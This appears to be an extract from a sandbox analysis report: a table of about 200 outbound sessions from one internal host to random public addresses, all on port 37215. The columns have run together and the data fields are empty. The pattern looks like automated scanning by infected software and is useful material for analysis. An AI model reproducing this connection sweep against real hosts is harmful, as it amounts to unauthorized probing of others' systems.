                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3485192.168.2.1555316197.188.38.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3486192.168.2.1551516197.6.26.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3487192.168.2.1541946197.207.37.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3488192.168.2.1557216197.170.44.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3489192.168.2.1537708197.37.117.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3490192.168.2.1557628197.104.147.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3491192.168.2.1540084197.72.10.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3492192.168.2.1556954197.49.231.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3493192.168.2.1557136197.119.115.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3494192.168.2.1559770197.239.72.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3495192.168.2.1537246197.209.111.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3496192.168.2.1537636197.154.28.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3497192.168.2.1540854197.245.109.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3498192.168.2.1546258197.176.176.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3499192.168.2.1534024197.153.188.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3500192.168.2.1538446197.83.173.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3501192.168.2.1535018197.120.49.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3502192.168.2.1552508197.241.181.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3503192.168.2.1552084197.40.35.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3504192.168.2.1551122197.237.197.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3505192.168.2.1535630197.45.33.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3506192.168.2.1536114197.72.61.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3507192.168.2.1544580197.12.213.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3508192.168.2.1549602197.84.98.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3509192.168.2.1545076197.130.235.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3510192.168.2.1537732197.174.172.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3511192.168.2.1542780197.102.71.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3512192.168.2.1546416197.69.25.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3513192.168.2.1535224197.127.36.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3514192.168.2.1543872197.236.241.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3515192.168.2.1540482197.79.21.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3516192.168.2.1545430197.10.206.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3517192.168.2.1532972197.230.144.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3518192.168.2.1542766197.172.143.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3519192.168.2.1553802197.40.82.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3520192.168.2.1535158197.60.203.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3521192.168.2.1549556197.31.157.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3522192.168.2.1547710197.10.114.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3523192.168.2.1533536197.91.242.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3524192.168.2.1551424197.83.114.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3525192.168.2.1555828197.76.165.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3526192.168.2.1559374197.164.222.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3527192.168.2.1534028197.251.46.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3528192.168.2.1547008197.32.247.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3529192.168.2.1534062197.77.59.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3530192.168.2.1559704197.245.159.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3531192.168.2.1539078197.20.159.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3532192.168.2.1542272197.131.72.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3533192.168.2.1549532197.113.129.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3534192.168.2.1545460197.64.141.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3535192.168.2.1548586197.65.87.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3536192.168.2.1555398197.167.37.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3537192.168.2.1543542197.149.154.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3538192.168.2.1557102197.200.125.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3539192.168.2.1554372197.104.152.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3540192.168.2.1547552197.143.170.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3541192.168.2.1545314197.89.210.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3542192.168.2.1559718197.198.86.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3543192.168.2.1546418197.138.42.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3544192.168.2.1543414197.105.121.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3545192.168.2.1533848197.52.36.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3546192.168.2.1549662197.250.23.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3547192.168.2.1536560197.95.32.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3548192.168.2.1551646197.120.137.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3549192.168.2.1542338197.77.80.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3550192.168.2.1547990197.179.212.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3551192.168.2.1546622197.46.170.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3552192.168.2.1533322197.233.65.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3553192.168.2.1540144197.161.1.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3554192.168.2.1535404197.118.146.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3555192.168.2.1555866197.247.4.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3556192.168.2.1549174197.86.62.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3557192.168.2.1549272197.26.216.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3558192.168.2.1546976197.65.194.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3559192.168.2.1559162197.83.0.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3560192.168.2.1545692197.245.205.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3561192.168.2.1537284197.175.252.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3562192.168.2.1535512197.135.70.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3563192.168.2.1537526197.207.161.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3564192.168.2.1554548197.225.82.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3565192.168.2.1547392197.40.184.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3566192.168.2.1559450197.87.164.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3567192.168.2.1547760197.142.83.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3568192.168.2.1550928197.59.212.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3569192.168.2.1534716197.10.54.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3570192.168.2.1541398197.235.134.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3571192.168.2.1560426197.60.220.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3572192.168.2.1539730197.63.158.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3573192.168.2.1552500197.224.198.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3574192.168.2.1554598197.185.102.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3575192.168.2.1550278197.242.153.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3576192.168.2.1548238197.114.231.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3577192.168.2.1559722197.152.166.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3578192.168.2.1549468197.77.218.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3579192.168.2.1533962197.162.183.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3580192.168.2.1548998197.176.79.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3581192.168.2.1538498197.176.167.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3582192.168.2.1548050197.82.37.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3583192.168.2.1554230197.107.105.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3584192.168.2.1558554197.174.175.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3585192.168.2.1541942197.4.165.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3586192.168.2.1550380197.36.77.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3587192.168.2.1534892197.121.127.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3588192.168.2.1544816197.69.144.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3589192.168.2.1547050197.193.81.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3590192.168.2.1560154197.23.90.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3591192.168.2.1537220197.126.127.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3592192.168.2.1545286197.32.30.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3593192.168.2.1536170197.69.243.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3594192.168.2.1535870197.66.161.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3595192.168.2.1553668197.187.140.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3596192.168.2.1547036197.126.9.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3597192.168.2.1541792197.98.160.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3598192.168.2.1556548197.121.161.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3599192.168.2.1560784197.164.117.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3600192.168.2.1546300197.226.105.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3601192.168.2.1548014197.65.166.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3602192.168.2.1549690197.194.144.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3603192.168.2.1545046197.242.65.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3604192.168.2.1547350197.106.210.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3605192.168.2.1552730197.74.96.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3606192.168.2.1547960197.110.220.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3607192.168.2.1538792197.88.37.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3608192.168.2.1556138197.141.67.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3609192.168.2.1549052197.24.164.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3610192.168.2.1534068197.141.111.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3611192.168.2.1537078197.126.130.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3612192.168.2.1557710197.230.6.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3613192.168.2.1536416197.250.162.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3614192.168.2.1552502197.86.126.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3615192.168.2.1544550197.112.86.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3616192.168.2.1544926197.74.219.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3617192.168.2.1554930197.122.241.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3618192.168.2.1554840197.58.157.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3619192.168.2.1547036197.24.13.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3620192.168.2.1544452197.217.244.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3621192.168.2.1549340197.10.120.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3622192.168.2.1533060197.77.107.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3623192.168.2.1543630197.94.189.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3624192.168.2.1551590197.54.75.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3625192.168.2.1534748197.93.123.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3626192.168.2.1546588197.1.163.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3627192.168.2.1547066197.149.134.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3628192.168.2.1537490197.121.1.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3629192.168.2.1555204197.6.223.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3630192.168.2.1545750197.87.192.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3631192.168.2.1542634197.122.144.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3632192.168.2.1557322197.25.226.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3633192.168.2.1538048197.105.152.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3634192.168.2.1557764197.120.167.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3635192.168.2.1538824197.177.13.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3636192.168.2.1553312197.63.24.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3637192.168.2.1544092197.110.127.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3638192.168.2.1555782197.120.43.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3639192.168.2.1533398197.102.107.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3640192.168.2.1556060197.239.172.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3641192.168.2.1547514197.92.79.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3642192.168.2.1547268197.182.121.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3643192.168.2.1539756197.228.131.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3644192.168.2.1559616197.190.208.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3645192.168.2.1540682197.102.172.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3646192.168.2.154886041.102.33.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3647192.168.2.153910841.88.210.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3648192.168.2.154952041.53.206.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3649192.168.2.154567441.241.45.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3650192.168.2.154097441.38.142.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3651192.168.2.154913441.245.99.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3652192.168.2.153607641.202.169.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3653192.168.2.153710841.105.143.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3654192.168.2.154894441.129.198.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3655192.168.2.153369641.91.207.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3656192.168.2.155088241.36.40.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3657192.168.2.154923441.178.122.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3658192.168.2.155959841.254.61.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3659192.168.2.153489441.30.34.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3660192.168.2.154145441.159.165.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3661192.168.2.154652241.93.254.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3662192.168.2.154331441.254.42.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3663192.168.2.154257641.7.31.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3664192.168.2.154031841.58.2.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3665192.168.2.154277841.243.156.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3666192.168.2.154841241.219.215.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3667192.168.2.156062841.101.78.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3668192.168.2.153833041.44.105.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3669192.168.2.155875441.161.125.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3670192.168.2.154966641.206.139.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3671192.168.2.155076241.124.53.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3672192.168.2.155084441.161.73.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3673192.168.2.155302041.133.134.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3674192.168.2.153776441.55.157.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3675192.168.2.154930841.181.142.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3676192.168.2.154084041.131.236.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3677192.168.2.153864441.220.235.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3678192.168.2.154469441.68.117.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3679192.168.2.154000041.39.98.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3680192.168.2.155417441.136.125.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3681192.168.2.153768241.39.133.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3682192.168.2.155621041.240.237.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3683192.168.2.153507641.64.165.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3684192.168.2.154614641.172.49.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
